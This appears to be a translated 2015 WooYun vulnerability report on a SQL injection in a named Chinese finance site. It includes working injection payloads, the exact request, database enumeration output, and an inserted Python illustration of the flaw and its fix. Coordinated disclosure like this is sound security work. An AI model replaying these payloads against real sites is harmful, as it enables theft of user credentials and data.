Vulnerability Summary

Defect ID: wooyun-2015-0131750

Title: P2P finance platform Puyi Wealth (普益财富) has a DBA-privilege SQL injection vulnerability (the entire database can be dumped, exposing large amounts of sensitive information)

Vendor: pywm.com.cn

Author: littelfire

Submitted: 2015-08-05 09:27

Fix deadline: 2015-09-20 12:00

Public disclosure: 2015-09-20 12:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability Details

Disclosure status:

2015-08-05: Details sent to the vendor, awaiting vendor response
2015-08-06: Vendor confirmed; details disclosed to the vendor only
2015-08-16: Details disclosed to core white hats and experts in the relevant field
2015-08-26: Details disclosed to regular white hats
2015-09-05: Details disclosed to intern white hats
2015-09-20: Details disclosed to the public

Brief description:

test

Detailed description:

The main Puyi Wealth site has a SQL injection vulnerability that can be used to obtain large amounts of sensitive database user information, including user passwords.

Proof of vulnerability:

Injection URL: http://www.pywm.com.cn:80/issue_product---index.html
POST-based SQL injection

POST /issue_product---index.html HTTP/1.1
Content-Length: 112
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.pywm.com.cn/
Cookie: PHPSESSID=db3fdf2a0148760f152971045d3c2af9; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
Host: www.pywm.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
button=%c9%b8%d1%a1&category=1&duration=&issue_way=&sale_state=&start_point=


The injection point is the category parameter

Parameter: category (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: button=%c9%b8%d1%a1&category=1 AND 9151=9151&duration=&issue_way=&sale_state=&start_point=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: button=%c9%b8%d1%a1&category=1 AND (SELECT * FROM (SELECT(SLEEP(5)))aqky)&duration=&issue_way=&sale_state=&start_point=
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: button=%c9%b8%d1%a1&category=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162626271,0x66544c4854435a585251,0x7171766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &duration=&issue_way=&sale_state=&start_point=
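The boolean-based probe above works because the category value is spliced into the SQL text, so `1 AND 9151=9151` and its false twin produce different result sets and act as an oracle. The following is an added illustration, not code from the report or from the vendor's site: a constructed sqlite table stands in for the product listing, the vulnerable concatenation is shown beside a hardened version that validates the integer and binds it as a parameter, and the table name, columns and rows are assumptions.

```python
import sqlite3

# Constructed sample data standing in for the listing behind
# issue_product---index.html; the schema and rows are assumptions, not the vendor's.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE issue_product (id INTEGER, name TEXT, category INTEGER)")
    con.executemany("INSERT INTO issue_product VALUES (?, ?, ?)",
                    [(1, "fund-a", 1), (2, "fund-b", 1), (3, "trust-c", 2)])
    return con

def vulnerable_query(con, category):
    # The defect: the POST parameter is concatenated straight into the SQL text,
    # so whatever follows the number becomes part of the WHERE clause.
    sql = "SELECT id, name FROM issue_product WHERE category=" + category
    return con.execute(sql).fetchall()

def hardened_query(con, category):
    # Fix 1: category is an integer id, so reject anything that is not digits.
    if not category.isdigit():
        raise ValueError("category must be a positive integer")
    # Fix 2: bind the value as a parameter; it can no longer change query structure.
    sql = "SELECT id, name FROM issue_product WHERE category=?"
    return con.execute(sql, (int(category),)).fetchall()

TRUE_PAYLOAD = "1 AND 9151=9151"   # the boolean-based blind probe from the report
FALSE_PAYLOAD = "1 AND 9151=9152"  # its false counterpart, constructed here

def demo():
    con = make_db()
    # Vulnerable path: the true and false probes return different row counts,
    # which is exactly the oracle a blind injection tool relies on.
    vuln_true = len(vulnerable_query(con, TRUE_PAYLOAD))
    vuln_false = len(vulnerable_query(con, FALSE_PAYLOAD))
    # Hardened path: the probe never reaches the database.
    try:
        hardened_query(con, TRUE_PAYLOAD)
        hardened_rejected = False
    except ValueError:
        hardened_rejected = True
    return {"vuln_true": vuln_true, "vuln_false": vuln_false,
            "hardened_rejected": hardened_rejected,
            "hardened_normal": len(hardened_query(con, "1"))}

if __name__ == "__main__":
    print(demo())
```

Validation plus parameter binding closes the injection; the DBA-level access shown later in the report is a separate finding and is addressed by running the web application under a database account limited to its own schema.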


SQL injection with DBA privileges

[Screenshot: 1.jpg]


Listing the databases shows 43 of them

[Screenshot: 2.jpg]


[*] bugfree2
[*] bugtracker
[*] cardinfo
[*] cj
[*] club
[*] cnbene
[*] cnbene_address
[*] cnbene_data
[*] cnbene_product
[*] code
[*] crm
[*] data
[*] delete
[*] democnbene
[*] dotproject
[*] fpsale
[*] fund_sale_admin
[*] gd_noxm
[*] gdnx
[*] gdnx_develop
[*] getbook
[*] historical_data_bak
[*] hxbbank_data
[*] information_schema
[*] jishiyu
[*] lccp_admin
[*] man_crm
[*] market
[*] member
[*] mysql
[*] partners_db
[*] pms
[*] product
[*] search_demo
[*] session
[*] sms
[*] soocai
[*] terrace
[*] test
[*] test_cnbene
[*] test_crm
[*] webadmin
[*] webdata


Enumerated the contents of the webadmin database

[Screenshot: 6.jpg]


+-----------------------------+
| card_dealer_getaccount |
| card_dealer_info |
| card_dealer_record |
| card_self_dealer_getaccount |
| exam_itempool |
| exam_question |
| front_accesscontrol |
| front_accesscontrol_stock |
| front_analyst_info |
| front_answer |
| front_answer_del |
| front_article |
| front_article_class |
| front_customer_info |
| front_group |
| front_group_stock |
| front_history_comment |
| front_knowledgebase |
| front_mydata |
| front_questions |
| front_questions_del |
| front_questions_stock |
| front_questionstype |
| front_stocksearchcount |
| front_visit |
| productsale_customize |
| ss_admingroup |
| ss_admingroup_temp |
| ss_adminloginlog |
| ss_adminrights |
| ss_adminuser |
| ss_adminuser_temp |
| ss_uploads |
+-----------------------------+


The ss_adminuser table holds account and password information for a large number of staff

[Screenshot: 5.jpg]


Database user information can also be dumped: there are 70 database users

[Screenshot: 4.jpg]


Dumped the password hashes of some of the users

[Screenshot: 3.jpg]



Suggested fix:

Filter input properly. Hoping for a high rank... I've submitted so many, is there a little gift?

Copyright notice: when reposting, please credit the source littelfire@WooYun (乌云)


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-08-06 11:58

Vendor reply:

Thanks

Latest status:

None yet